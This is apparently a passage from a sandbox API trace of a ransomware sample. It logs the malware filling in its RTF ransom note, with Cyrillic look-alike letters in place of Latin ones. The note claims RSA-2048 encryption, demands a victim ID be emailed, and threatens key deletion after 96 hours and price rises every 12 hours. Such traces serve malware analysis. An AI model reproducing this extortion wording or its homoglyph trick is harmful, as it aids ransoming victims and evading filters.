\\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will 
b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r", cchLength=0x15f4 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! \\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 
K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 [KID]\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 [EML1]\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! 
\\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL 
B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU DID N\\'EET R\\'E5C\\'E5IV\\'E5 TH\\'E5 \\'E0NSW\\'E5R") returned 0x15f4 [0112.814] CharUpperBuffW (in: lpsz="[KID]", cchLength=0x5 | out: lpsz="[KID]") returned 0x5 [0112.814] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1370000 [0112.815] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is 
imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 
r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! 
\\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'", cchLength=0x1610 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! 
\\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 
D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 COSLB0CVD9BCX1VP-3188F4D96148D062\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 [EML1]\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! 
